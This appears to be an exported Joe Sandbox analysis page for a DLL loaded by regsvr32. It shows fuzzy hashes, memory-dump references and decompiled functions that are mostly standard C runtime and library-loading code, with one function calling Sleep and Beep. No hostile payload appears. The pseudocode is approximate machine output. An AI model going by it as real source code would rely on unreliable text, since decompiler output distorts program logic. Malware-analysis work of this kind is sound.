Associated: 0000000C.00000002.1160866965.000000006E410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1160998743.000000006E46C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161008297.000000006E474000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161014163.000000006E476000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6e410000_regsvr32.jbxd

Similarity

API ID: LibraryLoad$__aullrem
String ID: KERNEL32.dll$Kernel32.dll
API String ID: 200764236-1263921953
Opcode ID: f6f162480d824f9bfe31c86663ea9430a06ff27f28149f2d886e7e4d45c1a2e3
Instruction ID: f9c10274b8759feeca432146cf689fcd318c37c3f512903f7f0a1fedb5b26990
Opcode Fuzzy Hash: f6f162480d824f9bfe31c86663ea9430a06ff27f28149f2d886e7e4d45c1a2e3
Instruction Fuzzy Hash: AF03AF74E092698FCB65CF69C894BEDBBB1AF89304F1081DAD849A7355D730AE81CF44

Uniqueness

Uniqueness Score: -1.00%

Function 6E457CAA Relevance: 3.5, APIs: 2, Instructions: 537
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(?), ref: 6E458107
Beep.KERNEL32(?,?), ref: 6E45834F

Memory Dump Source

Source File: 0000000C.00000002.1160881545.000000006E411000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E410000, based on PE: true

Associated: 0000000C.00000002.1160866965.000000006E410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1160998743.000000006E46C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161008297.000000006E474000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161014163.000000006E476000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6e410000_regsvr32.jbxd

Similarity

API ID: BeepSleep
String ID:
API String ID: 1411048902-0
Opcode ID: 46fe72fd0bdca59e229be3708422ecce8732ec18f74966e2e60f52e796c2d1db
Instruction ID: aa77827ed4721b9bf8b7ddeb59dc45319749804d3639346f775742b83c7b80aa
Opcode Fuzzy Hash: 46fe72fd0bdca59e229be3708422ecce8732ec18f74966e2e60f52e796c2d1db
Instruction Fuzzy Hash: 6D627C74E052698FDB64CFA9C890BDDBBB1BF49304F1081EAD849A7345DB31AA91CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6E416570 Relevance: 1.7, APIs: 1, Instructions: 180COMMON

Download Yara Rule

APIs

StrCmpIW.SHLWAPI(?,?), ref: 6E416788

Memory Dump Source

Source File: 0000000C.00000002.1160881545.000000006E411000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E410000, based on PE: true

Associated: 0000000C.00000002.1160866965.000000006E410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1160998743.000000006E46C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161008297.000000006E474000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161014163.000000006E476000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6e410000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cfd5883cca413833a7dfdc689259ca20efc5dd7d0617d1df7577ec54da2fb1b4
Instruction ID: a8cb6599437a683364ed935b78bce2bb7699d662e067a2ec60cb6d8b7947f6a7
Opcode Fuzzy Hash: cfd5883cca413833a7dfdc689259ca20efc5dd7d0617d1df7577ec54da2fb1b4
Instruction Fuzzy Hash: 02918DB8E04259DFCB44CFA9C590AEDBBB1BF88304F24819AD819AB355D734A942CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6E45A8C3 Relevance: 10.6, APIs: 7, Instructions: 136
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E6E45A8C3(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t34;
				signed int _t40;
				signed int _t41;
				signed int _t42;
				signed int _t45;
				signed char _t54;
				signed int _t56;
				signed int _t58;
				void* _t61;
				void* _t68;
				signed int _t72;
				signed int _t76;
				signed int _t80;
				void* _t82;

				_t68 = __edx;
				_push(0x10);
				_push(0x6e472410);
				E6E45ADD0(__ebx, __edi, __esi);
				_t34 =  *0x6e474fdc; // 0x1
				if(_t34 > 0) {
					 *0x6e474fdc = _t34 - 1;
					 *(_t82 - 0x1c) = 1;
					 *(_t82 - 4) =  *(_t82 - 4) & 0x00000000;
					 *((char*)(_t82 - 0x20)) = E6E45A2FB();
					 *(_t82 - 4) = 1;
					__eflags =  *0x6e474fb8 - 2;
					if( *0x6e474fb8 != 2) {
						E6E45ACAD(_t68, 1, __esi, 7);
						asm("int3");
						_push(0xc);
						_push(0x6e472438);
						E6E45ADD0(__ebx, 1, __esi);
						_t72 =  *(_t82 + 0xc);
						__eflags = _t72;
						if(_t72 != 0) {
							L9:
							 *(_t82 - 4) =  *(_t82 - 4) & 0x00000000;
							__eflags = _t72 - 1;
							if(_t72 == 1) {
								L12:
								_t58 =  *(_t82 + 0x10);
								_t76 = E6E45AA7E( *((intOrPtr*)(_t82 + 8)), _t72, _t58);
								 *(_t82 - 0x1c) = _t76;
								__eflags = _t76;
								if(_t76 != 0) {
									_t41 = E6E45A769(_t58, _t61, _t68, _t72, _t76,  *((intOrPtr*)(_t82 + 8)), _t72, _t58); // executed
									_t76 = _t41;
									 *(_t82 - 0x1c) = _t76;
									__eflags = _t76;
									if(_t76 != 0) {
										goto L14;
									}
								}
							} else {
								__eflags = _t72 - 2;
								if(_t72 == 2) {
									goto L12;
								} else {
									_t58 =  *(_t82 + 0x10);
									L14:
									_push(_t58);
									_push(_t72);
									_push( *((intOrPtr*)(_t82 + 8)));
									_t42 = E6E45AEB0();
									_t76 = _t42;
									 *(_t82 - 0x1c) = _t76;
									__eflags = _t72 - 1;
									if(_t72 == 1) {
										__eflags = _t76;
										if(_t76 == 0) {
											_push(_t58);
											_push(_t42);
											_push( *((intOrPtr*)(_t82 + 8)));
											_t45 = E6E45AEB0();
											__eflags = _t58;
											_t25 = _t58 != 0;
											__eflags = _t25;
											_push((_t45 & 0xffffff00 | _t25) & 0x000000ff);
											E6E45A8C3(_t58, _t68, _t72, _t76, _t25);
											_pop(_t61);
											E6E45AA7E( *((intOrPtr*)(_t82 + 8)), _t76, _t58);
										}
									}
									__eflags = _t72;
									if(_t72 == 0) {
										L19:
										_t76 = E6E45A769(_t58, _t61, _t68, _t72, _t76,  *((intOrPtr*)(_t82 + 8)), _t72, _t58);
										 *(_t82 - 0x1c) = _t76;
										__eflags = _t76;
										if(_t76 != 0) {
											_t76 = E6E45AA7E( *((intOrPtr*)(_t82 + 8)), _t72, _t58);
											 *(_t82 - 0x1c) = _t76;
										}
									} else {
										__eflags = _t72 - 3;
										if(_t72 == 3) {
											goto L19;
										}
									}
								}
							}
							 *(_t82 - 4) = 0xfffffffe;
							_t40 = _t76;
						} else {
							__eflags =  *0x6e474fdc - _t72; // 0x1
							if(__eflags > 0) {
								goto L9;
							} else {
								_t40 = 0;
							}
						}
						 *[fs:0x0] =  *((intOrPtr*)(_t82 - 0x10));
						return _t40;
					} else {
						E6E45A3C6(__ebx, _t61, 1, __esi);
						E6E45AEC2();
						E6E45AF23();
						 *0x6e474fb8 =  *0x6e474fb8 & 0x00000000;
						 *(_t82 - 4) =  *(_t82 - 4) & 0x00000000;
						E6E45A958();
						_t54 = E6E45A567( *((intOrPtr*)(_t82 + 8)), 0);
						asm("sbb esi, esi");
						_t80 =  ~(_t54 & 0x000000ff) & 1;
						__eflags = _t80;
						 *(_t82 - 0x1c) = _t80;
						 *(_t82 - 4) = 0xfffffffe;
						E6E45A965();
						_t56 = _t80;
						goto L4;
					}
				} else {
					_t56 = 0;
					L4:
					 *[fs:0x0] =  *((intOrPtr*)(_t82 - 0x10));
					return _t56;
				}
			}

0x6e45a8c3
0x6e45a8c3
0x6e45a8c5
0x6e45a8ca
0x6e45a8cf
0x6e45a8d6
0x6e45a8dd
0x6e45a8e5
0x6e45a8e8
0x6e45a8f1
0x6e45a8f4
0x6e45a8f7
0x6e45a8fe
0x6e45a96d
0x6e45a972
0x6e45a973
0x6e45a975
0x6e45a97a
0x6e45a97f
0x6e45a982
0x6e45a984
0x6e45a995
0x6e45a995
0x6e45a999
0x6e45a99c
0x6e45a9a8
0x6e45a9a8
0x6e45a9b5
0x6e45a9b7
0x6e45a9ba
0x6e45a9bc
0x6e45a9c7
0x6e45a9cc
0x6e45a9ce
0x6e45a9d1
0x6e45a9d3
0x00000000
0x00000000
0x6e45a9d3
0x6e45a99e
0x6e45a99e
0x6e45a9a1
0x00000000
0x6e45a9a3
0x6e45a9a3
0x6e45a9d9
0x6e45a9d9
0x6e45a9da
0x6e45a9db
0x6e45a9de
0x6e45a9e3
0x6e45a9e5
0x6e45a9e8
0x6e45a9eb
0x6e45a9ed
0x6e45a9ef
0x6e45a9f1
0x6e45a9f2
0x6e45a9f3
0x6e45a9f6
0x6e45a9fb
0x6e45a9fd
0x6e45a9fd
0x6e45aa03
0x6e45aa04
0x6e45aa09
0x6e45aa0f
0x6e45aa0f
0x6e45a9ef
0x6e45aa14
0x6e45aa16
0x6e45aa1d
0x6e45aa27
0x6e45aa29
0x6e45aa2c
0x6e45aa2e
0x6e45aa3a
0x6e45aa62
0x6e45aa62
0x6e45aa18
0x6e45aa18
0x6e45aa1b
0x00000000
0x00000000
0x6e45aa1b
0x6e45aa16
0x6e45a9a1
0x6e45aa65
0x6e45aa6c
0x6e45a986
0x6e45a986
0x6e45a98c
0x00000000
0x6e45a98e
0x6e45a98e
0x6e45a98e
0x6e45a98c
0x6e45aa71
0x6e45aa7d
0x6e45a900
0x6e45a900
0x6e45a905
0x6e45a90a
0x6e45a90f
0x6e45a916
0x6e45a91a
0x6e45a924
0x6e45a930
0x6e45a932
0x6e45a932
0x6e45a934
0x6e45a937
0x6e45a93e
0x6e45a943
0x00000000
0x6e45a943
0x6e45a8d8
0x6e45a8d8
0x6e45a945
0x6e45a948
0x6e45a954
0x6e45a954

APIs

__RTC_Initialize.LIBCMT ref: 6E45A90A
___scrt_uninitialize_crt.LIBCMT ref: 6E45A924

Memory Dump Source

Source File: 0000000C.00000002.1160881545.000000006E411000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E410000, based on PE: true

Associated: 0000000C.00000002.1160866965.000000006E410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1160998743.000000006E46C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161008297.000000006E474000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161014163.000000006E476000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6e410000_regsvr32.jbxd

Similarity

API ID: Initialize___scrt_uninitialize_crt
String ID:
API String ID: 2442719207-0
Opcode ID: 771313cab6d82054282ed1916fd4b8db4cdcd96314ba5fea404838402b826b57
Instruction ID: 6f4a81291192a625ff54a4de50fdd216e6f8bcf34d8edd4dffb04b28adf57c14
Opcode Fuzzy Hash: 771313cab6d82054282ed1916fd4b8db4cdcd96314ba5fea404838402b826b57
Instruction Fuzzy Hash: 5E419D72D00665EECB219FF58D00FAE7A69AF81A95F01481BE8146B340D7304D21EBF0

Uniqueness

Uniqueness Score: -1.00%

Function 6E4611A3 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E6E4611A3(void* __ecx, signed int* _a4, intOrPtr _a8) {
				signed int* _v8;
				void** _t12;
				void* _t13;
				void* _t16;
				void* _t18;
				signed int _t22;
				WCHAR* _t23;
				void** _t26;
				signed int* _t29;
				void* _t32;
				void* _t34;

				_t29 = _a4;
				while(_t29 != _a8) {
					_t22 =  *_t29;
					_t12 = 0x6e475548 + _t22 * 4;
					_t32 =  *_t12;
					_v8 = _t12;
					if(_t32 == 0) {
						_t23 =  *(0x6e46d690 + _t22 * 4);
						_t13 = LoadLibraryExW(_t23, 0, 0x800); // executed
						_t32 = _t13;
						if(_t32 != 0) {
							L12:
							_t26 = _v8;
							 *_t26 = _t32;
							if( *_t26 != 0) {
								FreeLibrary(_t32);
							}
							L14:
							if(_t32 != 0) {
								_t16 = _t32;
								L18:
								return _t16;
							}
							L15:
							_t29 =  &(_t29[1]);
							continue;
						}
						_t18 = GetLastError();
						if(_t18 != 0x57) {
							L9:
							_t32 = 0;
							L10:
							if(_t32 != 0) {
								goto L12;
							}
							 *_v8 = _t18 | 0xffffffff;
							goto L15;
						}
						_t18 = E6E460AC8(_t23, L"api-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = E6E460AC8(_t23, L"ext-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = LoadLibraryExW(_t23, _t32, _t32);
						_t32 = _t18;
						goto L10;
					}
					if(_t32 == 0xffffffff) {
						goto L15;
					}
					goto L14;
				}
				_t16 = 0;
				goto L18;
			}

0x6e4611ac
0x6e461256
0x6e4611b4
0x6e4611b6
0x6e4611bd
0x6e4611bf
0x6e4611c5
0x6e4611d2
0x6e4611e1
0x6e4611e7
0x6e4611eb
0x6e46123d
0x6e46123d
0x6e461242
0x6e461246
0x6e461249
0x6e461249
0x6e46124f
0x6e461251
0x6e461266
0x6e461261
0x6e461265
0x6e461265
0x6e461253
0x6e461253
0x00000000
0x6e461253
0x6e4611ed
0x6e4611f6
0x6e46122d
0x6e46122d
0x6e46122f
0x6e461231
0x00000000
0x00000000
0x6e461239
0x00000000
0x6e461239
0x6e461200
0x6e461205
0x6e46120a
0x00000000
0x00000000
0x6e461214
0x6e461219
0x6e46121e
0x00000000
0x00000000
0x6e461223
0x6e461229
0x00000000
0x6e461229
0x6e4611ca
0x00000000
0x00000000
0x00000000
0x6e4611d0
0x6e46125f
0x00000000

Strings

ext-ms-, xrefs: 6E46120E
api-ms-, xrefs: 6E4611FA

Memory Dump Source

Source File: 0000000C.00000002.1160881545.000000006E411000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E410000, based on PE: true

Associated: 0000000C.00000002.1160866965.000000006E410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1160998743.000000006E46C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161008297.000000006E474000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161014163.000000006E476000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6e410000_regsvr32.jbxd

Similarity

API ID:
String ID: api-ms-$ext-ms-
API String ID: 0-537541572
Opcode ID: 92121d2d45f0f3d3050795ac46ff4697980cfa4e6fe91146dd1b94223a819a88
Instruction ID: 9428ea76862a544e185b411d1ce3ac816f53436c01c54308b6940b589d608913
Opcode Fuzzy Hash: 92121d2d45f0f3d3050795ac46ff4697980cfa4e6fe91146dd1b94223a819a88
Instruction Fuzzy Hash: 3121E771E45625ABDF519AF99C80E5A3769AF467A0F110513E81DFB380D770ED0486D0

Uniqueness

Uniqueness Score: -1.00%

Function 6E45D0F7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E6E45D0F7(void* __ecx, signed int* _a4, intOrPtr _a8) {
				WCHAR* _v8;
				signed int _t11;
				WCHAR* _t12;
				struct HINSTANCE__* _t13;
				struct HINSTANCE__* _t16;
				struct HINSTANCE__* _t18;
				signed int* _t22;
				signed int* _t26;
				struct HINSTANCE__* _t29;
				WCHAR* _t31;
				void* _t32;

				_t26 = _a4;
				while(_t26 != _a8) {
					_t11 =  *_t26;
					_t22 = 0x6e4753dc + _t11 * 4;
					_t29 =  *_t22;
					if(_t29 == 0) {
						_t12 =  *(0x6e46cd00 + _t11 * 4);
						_v8 = _t12;
						_t13 = LoadLibraryExW(_t12, 0, 0x800); // executed
						_t29 = _t13;
						if(_t29 != 0) {
							L13:
							 *_t22 = _t29;
							if( *_t22 != 0) {
								FreeLibrary(_t29);
							}
							L15:
							_t16 = _t29;
							L12:
							return _t16;
						}
						_t18 = GetLastError();
						if(_t18 != 0x57) {
							L8:
							 *_t22 = _t18 | 0xffffffff;
							L9:
							_t26 =  &(_t26[1]);
							continue;
						}
						_t31 = _v8;
						_t18 = E6E460AC8(_t31, L"api-ms-", 7);
						_t32 = _t32 + 0xc;
						if(_t18 == 0) {
							goto L8;
						}
						_t18 = LoadLibraryExW(_t31, 0, 0);
						_t29 = _t18;
						if(_t29 != 0) {
							goto L13;
						}
						goto L8;
					}
					if(_t29 != 0xffffffff) {
						goto L15;
					}
					goto L9;
				}
				_t16 = 0;
				goto L12;
			}

0x6e45d0fe
0x6e45d172
0x6e45d103
0x6e45d105
0x6e45d10c
0x6e45d110
0x6e45d119
0x6e45d128
0x6e45d12b
0x6e45d131
0x6e45d135
0x6e45d17e
0x6e45d180
0x6e45d184
0x6e45d187
0x6e45d187
0x6e45d18d
0x6e45d18d
0x6e45d179
0x6e45d17d
0x6e45d17d
0x6e45d137
0x6e45d140
0x6e45d16a
0x6e45d16d
0x6e45d16f
0x6e45d16f
0x00000000
0x6e45d16f
0x6e45d142
0x6e45d14d
0x6e45d152
0x6e45d157
0x00000000
0x00000000
0x6e45d15e
0x6e45d164
0x6e45d168
0x00000000
0x00000000
0x00000000
0x6e45d168
0x6e45d115
0x00000000
0x00000000
0x00000000
0x6e45d117
0x6e45d177
0x00000000

APIs

FreeLibrary.KERNEL32(00000000,?,?,6E45D1B8,00000000,?,00000001,00000000,?,6E45D22F,00000001,FlsFree,6E46CDBC,FlsFree,00000000), ref: 6E45D187

Strings

api-ms-, xrefs: 6E45D147

Memory Dump Source

Source File: 0000000C.00000002.1160881545.000000006E411000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E410000, based on PE: true

Associated: 0000000C.00000002.1160866965.000000006E410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1160998743.000000006E46C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161008297.000000006E474000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161014163.000000006E476000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6e410000_regsvr32.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-
API String ID: 3664257935-2084034818
Opcode ID: 7d1ed84ca8447ab9b9770f26b4116ad040529dcee09982145b415b8372c4a3db
Instruction ID: 226de41482d4d358a2ccb2e6d8b23b0f1fdf2d05836aa9d83ff0fe3f918747fd
Opcode Fuzzy Hash: 7d1ed84ca8447ab9b9770f26b4116ad040529dcee09982145b415b8372c4a3db
Instruction Fuzzy Hash: 08117071A85625ABDF529AF89C44F5B37A4AF027A0F110222E915EB384D7A0FD11CAD1

Uniqueness

Uniqueness Score: -1.00%

Function 6E45A973 Relevance: 7.6, APIs: 5, Instructions: 87
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 83%

			E6E45A973(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t24;
				signed int _t25;
				signed int _t26;
				signed int _t29;
				signed int _t35;
				void* _t37;
				void* _t40;
				signed int _t42;
				signed int _t45;
				void* _t47;
				void* _t52;

				_t40 = __edx;
				_push(0xc);
				_push(0x6e472438);
				E6E45ADD0(__ebx, __edi, __esi);
				_t42 =  *(_t47 + 0xc);
				if(_t42 != 0) {
					L3:
					 *(_t47 - 4) =  *(_t47 - 4) & 0x00000000;
					__eflags = _t42 - 1;
					if(_t42 == 1) {
						L6:
						_t35 =  *(_t47 + 0x10);
						_t45 = E6E45AA7E( *((intOrPtr*)(_t47 + 8)), _t42, _t35);
						 *(_t47 - 0x1c) = _t45;
						__eflags = _t45;
						if(_t45 == 0) {
							L16:
							 *(_t47 - 4) = 0xfffffffe;
							_t24 = _t45;
							L17:
							 *[fs:0x0] =  *((intOrPtr*)(_t47 - 0x10));
							return _t24;
						}
						_t25 = E6E45A769(_t35, _t37, _t40, _t42, _t45,  *((intOrPtr*)(_t47 + 8)), _t42, _t35); // executed
						_t45 = _t25;
						 *(_t47 - 0x1c) = _t45;
						__eflags = _t45;
						if(_t45 == 0) {
							goto L16;
						}
						L8:
						_push(_t35);
						_push(_t42);
						_push( *((intOrPtr*)(_t47 + 8)));
						_t26 = E6E45AEB0();
						_t45 = _t26;
						 *(_t47 - 0x1c) = _t45;
						__eflags = _t42 - 1;
						if(_t42 == 1) {
							__eflags = _t45;
							if(_t45 == 0) {
								_push(_t35);
								_push(_t26);
								_push( *((intOrPtr*)(_t47 + 8)));
								_t29 = E6E45AEB0();
								__eflags = _t35;
								_t14 = _t35 != 0;
								__eflags = _t14;
								_push((_t29 & 0xffffff00 | _t14) & 0x000000ff);
								E6E45A8C3(_t35, _t40, _t42, _t45, _t14);
								_pop(_t37);
								E6E45AA7E( *((intOrPtr*)(_t47 + 8)), _t45, _t35);
							}
						}
						__eflags = _t42;
						if(_t42 == 0) {
							L13:
							_t45 = E6E45A769(_t35, _t37, _t40, _t42, _t45,  *((intOrPtr*)(_t47 + 8)), _t42, _t35);
							 *(_t47 - 0x1c) = _t45;
							__eflags = _t45;
							if(_t45 != 0) {
								_t45 = E6E45AA7E( *((intOrPtr*)(_t47 + 8)), _t42, _t35);
								 *(_t47 - 0x1c) = _t45;
							}
							goto L16;
						} else {
							__eflags = _t42 - 3;
							if(_t42 != 3) {
								goto L16;
							}
							goto L13;
						}
					}
					__eflags = _t42 - 2;
					if(_t42 == 2) {
						goto L6;
					}
					_t35 =  *(_t47 + 0x10);
					goto L8;
				}
				_t52 =  *0x6e474fdc - _t42; // 0x1
				if(_t52 > 0) {
					goto L3;
				}
				_t24 = 0;
				goto L17;
			}

0x6e45a973
0x6e45a973
0x6e45a975
0x6e45a97a
0x6e45a97f
0x6e45a984
0x6e45a995
0x6e45a995
0x6e45a999
0x6e45a99c
0x6e45a9a8
0x6e45a9a8
0x6e45a9b5
0x6e45a9b7
0x6e45a9ba
0x6e45a9bc
0x6e45aa65
0x6e45aa65
0x6e45aa6c
0x6e45aa6e
0x6e45aa71
0x6e45aa7d
0x6e45aa7d
0x6e45a9c7
0x6e45a9cc
0x6e45a9ce
0x6e45a9d1
0x6e45a9d3
0x00000000
0x00000000
0x6e45a9d9
0x6e45a9d9
0x6e45a9da
0x6e45a9db
0x6e45a9de
0x6e45a9e3
0x6e45a9e5
0x6e45a9e8
0x6e45a9eb
0x6e45a9ed
0x6e45a9ef
0x6e45a9f1
0x6e45a9f2
0x6e45a9f3
0x6e45a9f6
0x6e45a9fb
0x6e45a9fd
0x6e45a9fd
0x6e45aa03
0x6e45aa04
0x6e45aa09
0x6e45aa0f
0x6e45aa0f
0x6e45a9ef
0x6e45aa14
0x6e45aa16
0x6e45aa1d
0x6e45aa27
0x6e45aa29
0x6e45aa2c
0x6e45aa2e
0x6e45aa3a
0x6e45aa62
0x6e45aa62
0x00000000
0x6e45aa18
0x6e45aa18
0x6e45aa1b
0x00000000
0x00000000
0x00000000
0x6e45aa1b
0x6e45aa16
0x6e45a99e
0x6e45a9a1
0x00000000
0x00000000
0x6e45a9a3
0x00000000
0x6e45a9a3
0x6e45a986
0x6e45a98c
0x00000000
0x00000000
0x6e45a98e
0x00000000

APIs

dllmain_raw.LIBCMT ref: 6E45A9B0
dllmain_crt_dispatch.LIBCMT ref: 6E45A9C7
dllmain_raw.LIBCMT ref: 6E45AA0F
dllmain_crt_dispatch.LIBCMT ref: 6E45AA22
dllmain_raw.LIBCMT ref: 6E45AA35

Memory Dump Source

Source File: 0000000C.00000002.1160881545.000000006E411000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E410000, based on PE: true

Associated: 0000000C.00000002.1160866965.000000006E410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1160998743.000000006E46C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161008297.000000006E474000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161014163.000000006E476000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6e410000_regsvr32.jbxd

Similarity

API ID: dllmain_raw$dllmain_crt_dispatch
String ID:
API String ID: 3136044242-0
Opcode ID: 7899d31e9e7323bbc6af8d57a497ab653d347de10fe463edc671ab715bdc564a
Instruction ID: 865a1db68c53f38c05045d0ba7254687528441caed6ebe39290059cd0bdf427c
Opcode Fuzzy Hash: 7899d31e9e7323bbc6af8d57a497ab653d347de10fe463edc671ab715bdc564a
Instruction Fuzzy Hash: A6215C72D0062AEFCB618EF5CD44EAF3A69EF81A94F01451BE8146B710D7308D61ABF0

Uniqueness

Uniqueness Score: -1.00%

Function 6E4638E7 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 99
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 80%

			E6E4638E7(signed int __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, char _a8, char _a12, void* _a16) {
				void* _v5;
				char _v12;
				char _v16;
				char* _v20;
				char _v24;
				void* __ebp;
				char _t37;
				signed int _t42;
				signed int _t46;
				char _t49;
				char _t56;
				signed int _t62;
				void* _t73;
				void* _t79;
				signed int _t84;

				_t77 = __edx;
				_push(_a16);
				_push(_a12);
				E6E4639FB(__ebx, __edx, __edi, __esi, __eflags);
				_t37 = E6E463691(__eflags, _a4);
				_v16 = _t37;
				if(_t37 !=  *((intOrPtr*)( *(_a12 + 0x48) + 4))) {
					_push(__ebx);
					_push(__esi);
					_push(__edi);
					_t79 = E6E461AF9(0x220);
					_t62 = __ebx | 0xffffffff;
					__eflags = _t79;
					if(__eflags == 0) {
						L5:
						_t84 = _t62;
					} else {
						_t79 = memcpy(_t79,  *(_a12 + 0x48), 0x88 << 2);
						 *_t79 =  *_t79 & 0x00000000; // executed
						_t42 = E6E463AF6(_t77, __eflags, _v16, _t79); // executed
						_t84 = _t42;
						__eflags = _t84 - _t62;
						if(__eflags != 0) {
							__eflags = _a8;
							if(_a8 == 0) {
								E6E462AAB();
							}
							asm("lock xadd [eax], ebx");
							_t64 = _t62 == 1;
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								_t56 = _a12;
								__eflags =  *((intOrPtr*)(_t56 + 0x48)) - 0x6e4741e0;
								if( *((intOrPtr*)(_t56 + 0x48)) != 0x6e4741e0) {
									E6E4610BE( *((intOrPtr*)(_t56 + 0x48)));
								}
							}
							 *_t79 = 1;
							_t73 = _t79;
							_t79 = 0;
							 *(_a12 + 0x48) = _t73;
							_t46 =  *0x6e474708; // 0xfffffffe
							__eflags =  *(_a12 + 0x350) & _t46;
							if(__eflags == 0) {
								_v24 =  &_a12;
								_v20 =  &_a16;
								_t49 = 5;
								_v16 = _t49;
								_v12 = _t49;
								_push( &_v16);
								_push( &_v24);
								_push( &_v12);
								E6E463583(_t64, 0, _t84, __eflags);
								__eflags = _a8;
								if(_a8 != 0) {
									 *0x6e4741d4 =  *_a16;
								}
							}
						} else {
							 *((intOrPtr*)(E6E4602B2(__eflags))) = 0x16;
							goto L5;
						}
					}
					E6E4610BE(_t79);
					return _t84;
				} else {
					return 0;
				}
			}

0x6e4638e7
0x6e4638ef
0x6e4638f2
0x6e4638f5
0x6e4638fd
0x6e463908
0x6e463911
0x6e463917
0x6e463918
0x6e463919
0x6e463924
0x6e463926
0x6e46392a
0x6e46392c
0x6e46395c
0x6e46395c
0x6e46392e
0x6e46393b
0x6e463941
0x6e463944
0x6e463949
0x6e46394d
0x6e46394f
0x6e46396c
0x6e463970
0x6e463972
0x6e463972
0x6e46397d
0x6e463981
0x6e463981
0x6e463982
0x6e463984
0x6e463987
0x6e46398e
0x6e463993
0x6e463998
0x6e46398e
0x6e463999
0x6e46399f
0x6e4639a4
0x6e4639a6
0x6e4639ac
0x6e4639b1
0x6e4639b7
0x6e4639bc
0x6e4639c7
0x6e4639ca
0x6e4639cb
0x6e4639ce
0x6e4639d4
0x6e4639d8
0x6e4639dc
0x6e4639dd
0x6e4639e2
0x6e4639e6
0x6e4639f1
0x6e4639f1
0x6e4639e6
0x6e463951
0x6e463956
0x00000000
0x6e463956
0x6e46394f
0x6e46395f
0x6e46396b
0x6e463913
0x6e463916
0x6e463916

APIs

Part of subcall function 6E463691: GetOEMCP.KERNEL32(00000000,6E463902,6E464EC8,00000000,00000000,00000000,00000000,?,6E464EC8), ref: 6E4636BC

_free.LIBCMT ref: 6E46395F

Strings

<w, xrefs: 6E4639F1
AGn, xrefs: 6E463987

Memory Dump Source

Source File: 0000000C.00000002.1160881545.000000006E411000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E410000, based on PE: true

Associated: 0000000C.00000002.1160866965.000000006E410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1160998743.000000006E46C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161008297.000000006E474000.00000004.00000001.01000000.00000009.sdmpDownload File
